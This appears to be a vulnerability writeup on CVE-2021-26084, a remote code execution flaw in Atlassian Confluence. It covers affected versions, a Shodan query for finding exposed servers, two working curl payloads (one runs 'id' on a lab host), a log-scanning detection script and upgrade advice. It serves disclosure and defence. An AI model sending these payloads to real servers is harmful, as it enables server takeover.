Atlassian Confluence Vulnerability Overview
Atlassian Confluence is enterprise knowledge management and collaboration software from Atlassian, used to build enterprise document libraries and more. On August 26, 2021, Atlassian officially disclosed CVE-2021-26084, a remote code execution vulnerability in Atlassian Confluence. An attacker who is authenticated, or in some scenarios unauthenticated, can send a crafted request that triggers OGNL expression injection, executing arbitrary code and taking control of the server.
Affected Versions of Atlassian Confluence
- Atlassian Confluence Server/Data Center < 6.13.23
- 6.14.0 ≤ Atlassian Confluence Server/Data Center < 7.4.11
- 7.5.0 ≤ Atlassian Confluence Server/Data Center < 7.11.6
- 7.12.0 ≤ Atlassian Confluence Server/Data Center < 7.12.5
Shodan Search Syntax for Atlassian Confluence
http.favicon.hash:-305179312

Vulnerability Exploit
https://github.com/r0ckysec/CVE-2021-26084_Confluence
Vulnerability Environment Setup
Use vulhub for setup.



Vulnerability Reproduction
Send the request directly; the response contains the calculated result of 233*233.
curl -X POST -d 'queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027' http://vul.zgao.top:8090/pages/doenterpagevariables.action 2>/dev/null | grep -C3 54289

curl -X POST -d 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027' http://vul.zgao.top:8090/pages/doenterpagevariables.action 2>/dev/null | grep -C3 uid=


Intrusion Traceability
Confluence itself does not log web requests, so the investigation has to rely on the logs of other components.
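One way to run that investigation from a reverse proxy's access log, as an added example that is not part of the original post. It assumes the proxy in front of Confluence writes combined-style lines with the request body as the last quoted field (an assumed layout; the sample lines are constructed), and it flags POSTs to the endpoint used above whose queryString carries unicode-escaped characters.

```python
import re
from urllib.parse import parse_qs, urlsplit

TARGET = "/pages/doenterpagevariables.action"  # endpoint used in the requests above
# Assumption: combined-style log line with the request body as the last quoted field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$')
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
# Tokens taken from the requests shown on this page, matched after normalisation.
TOKENS = ("class.forname", "scriptenginemanager", "processbuilder", "eval(")

def normalize(value):
    # Resolve literal backslash-u escapes so an escaped "e" in eval still matches.
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), value)

def classify(line):
    # None for unrelated lines; otherwise a finding with severity and reasons.
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or not urlsplit(m["uri"]).path.endswith(TARGET):
        return None
    reasons = []
    for value in parse_qs(m["body"], keep_blank_values=True).get("queryString", []):
        if UNICODE_ESC.search(value):
            reasons.append("unicode-escaped characters in queryString")
        lowered = normalize(value).lower()
        reasons += ["token " + t for t in TOKENS if t in lowered]
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "severity": "high" if reasons else "review", "reasons": reasons}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2021:10:02:11 +0000] "POST /pages/doenterpagevariables.action '
    'HTTP/1.1" 200 33412 "queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027"',
    '198.51.100.4 - - [01/Sep/2021:10:03:40 +0000] "POST /pages/doenterpagevariables.action '
    'HTTP/1.1" 200 33987 "queryString=%5cu0027%2b%7bClass.forName%28%5cu0027'
    'javax.script.ScriptEngineManager%5cu0027%29%7d%2b%5cu0027"',
    '192.0.2.10 - - [01/Sep/2021:10:05:02 +0000] "POST /pages/doenterpagevariables.action '
    'HTTP/1.1" 200 28110 "templateId=65541&spaceKey=DOCS"',
    '192.0.2.10 - - [01/Sep/2021:10:05:09 +0000] "GET /dashboard.action HTTP/1.1" 200 5120 "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "review" finding is a POST to the endpoint without the markers; it is kept so that requests whose body the proxy did not capture still surface for manual triage.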
Fix Method
Upgrade Confluence to the latest version.